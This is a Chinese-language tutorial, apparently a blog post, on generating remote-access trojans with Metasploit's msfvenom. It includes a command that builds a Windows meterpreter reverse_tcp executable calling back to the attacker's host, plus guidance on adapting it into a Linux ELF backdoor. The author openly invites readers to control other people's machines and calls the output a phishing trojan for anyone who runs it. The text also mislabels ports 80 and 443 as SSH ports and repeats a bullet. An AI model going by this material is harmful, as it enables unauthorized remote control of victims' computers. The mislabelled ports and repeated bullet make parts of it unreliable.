本节内容需要使用到 Kali Linux,如果不知道在哪里下载或安装的,可以参考我另一篇《Kali Linux 渗透测试系统下载与安装》,直接下载 VMware Kali 虚拟机的文件,就能打开使用。
一、Metasploit 是什么?
Metasploit是一款开源的安全漏洞检测工具,也称为MSF(Metasploit Framework)。MSF集成了各种平台上常见的溢出漏洞和流行的shellcode,也保持长期更新状态。
Metasploit可以将复杂的漏洞攻击流程变得非常简单,即使你没有相关经验,只需要几个小时的学习,你就可以利用这个工具对主流操作系统发起攻击。也就是说,通过使用Metasploit,你可以轻松地模拟黑客攻击,测试系统的安全性,并发现潜在的安全漏洞。
二、利用MSF工具生成远控木马
你是否想远控别人的机器?那么 msfvenom 刚好适合你来操作。
2.1、msfvenom 介绍
msfvenom是Metasploit Framework(MSF)中的一种工具,它可以将特定的恶意代码插入到目标系统中,从而控制目标系统。它可以用来创建后门程序,在目标机器上执行后门后,在本地监听就能上线shell。通俗来说,msfvenom可以用来攻击计算机系统,使得攻击者可以控制被攻击的计算机。
2.2、msfvenom 使用
命令:msfvenom -p [payload] [options] > [output file],其中,-p选项后面是要使用的payload,[options]是可选的参数,[output file]是输出的文件名。
例如,要使用 windows/x64/meterpreter/reverse_tcp payload,并监听TCP端口2222,可以使用以下命令:
这会生成一个名为 output.exe 的可执行文件,其中包含恶意载荷。当受害者运行该文件时,攻击者可以通过反向TCP连接获取受害者的控制权。
2.3、msfvenom 解析
初学者看不懂命令没有关系,接下来逐个进行解析。我把重点要讲的使用颜色进行标记。
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST= 虚拟机IP LPORT=2222 > output.exe
- -p:这里指的 payload,其通常指的是攻击者通过漏洞或者社交工程等手段,向目标系统发送的恶意代码或指令,以达到控制、窃取数据或
破坏系统等目的。 - windows/x64/meterpreter/reverse_tcp
- Windows x64 大家都知道,是Windows 64位的系统。
- meterpreter 他是MSF的一个模块,可理解为用于远程执行命令,比如在目标Windows机器上创建一个用户、下载他D盘文件等。
- Reverse_TCP 是一种基于TCP协议的反向链接反弹shell,通常用于绕过服务端的防火墙。例如在局域网中,黑客想远程主动连接到你的电脑,会经过很多的防火墙或路由器NAT转发等,最终导致无法远控。那反过来思考,让目标电脑主动连接黑客的设备,那是不是就达到绕过防火墙的目的了。
- 虚拟机IP:注意!这里需要填写的是虚拟机的本地IP,而不是目标机器的IP地址。简而言之,我生成了一个钓鱼木马程序,谁点击运行了我并不知道,也不用知道,愿者上钩。
- 2222 :这里是TCP端口,在0~65535之间,随意选择一个就行。尽量选择10000以上的端口号,不要选择22(SSH端口)、80(SSH端口)、443(SSH端口)、3306(Mysql默认端口)、3389(Win远程连接端口)这种端口号。
- output.exe:远控木马程序的名称,名称随意修改,exe后缀不要改动。如果没有指定生成目录的话,默认输出到当前目录,可以输入 pwd 命令查看当前目录在哪里。
- -p:这里指的 payload,其通常指的是攻击者通过漏洞或者社交工程等手段,向目标系统发送的恶意代码或指令,以达到控制、窃取数据或
假如看到了这句历史命令,能知道是生成什么样的后门吗?我们可以通过“Windows”、“.exe”来判断是Windows的后门。那我们举一反三,生成 Linux 内核系统的后门,应该如何操作呢?
可以看一下我改动了哪里呢?可以看一下我第一次输入的命令是报了“invalid payload”错误,这是因为一个简单的拼写错误或大小写错误都可能导致报错。
- 改动①:windows 替换成了 linux(注意大小写)
- 改动②:exe 替换成了 elf,elf是一种常见的二进制文件格式,用于存储程序或库在不同UNIX系统(如Linux、FreeBSD等)上的可执行代码、数据以及相关的元数据。
